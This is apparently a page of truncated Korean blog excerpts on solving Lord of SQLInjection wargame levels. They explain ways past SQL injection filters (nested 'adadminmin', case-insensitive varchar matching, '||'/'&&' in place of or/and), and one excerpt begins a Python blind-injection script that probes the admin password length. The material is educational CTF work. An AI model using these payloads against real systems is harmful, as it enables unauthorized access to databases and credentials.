php 코드를 보면, 이전 문제에서 id 검색에서는 대소문자를 구별하지 않는다는 점을 이용하여 exploit 했었다. 이번에는 strtolower 라는 함수로 GET 방식으로 전달받은 id 문자열을 모두 소문자로 바꾸어준다. 또한 str_replace() 함수로 admin 이라는 문자열을 공백으로 replace 한다. 그렇다면 어떻게 해야할까. admin이라는 문자열을 공백으로 비운다고 하니, admin 이라는 문자열 안에 admin 이라는 문자열을 희생양으로 바치면 된다. 즉, adadminmin 과 같은 식으로 id 에 전달해준다면 결과적으로는, ad""min -> admin 이 되어 가운데에 있던 admin이 공백으로 바뀌고 앞뒤 문자열이 합쳐져 다시금 admin 이라는 문자열이 생성될 것이다. a..
MySQL에서 테이블을 생성할 때 id 를 단순하게 'varchar' 로 선언했다면 id를 검색할 적에 대소문자를 구별하지 않는다. 이를 이용하여 문자열 필터링을 우회할 수 있다. Tastes good.
import requests requests.packages.urllib3.disable_warnings() org_url = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php" header = {'Cookie': 'PHPSESSID='} session = requests.session() # Check Length of PW for i in range(0, 100): payload = "?pw=ABCD' || id='admin' %26%26 length(pw)=" + "'" + str(i) res = session.get(url = org_url + payload, headers=header, verify=False) if "..
간단하게 id를 admin으로 맞추는 대신에 or 와 and 라는 문자열을 필터링하는 문제이다. MySQL에서 or 는 '||'로, and 는 '&&'로 치환하면 된다.
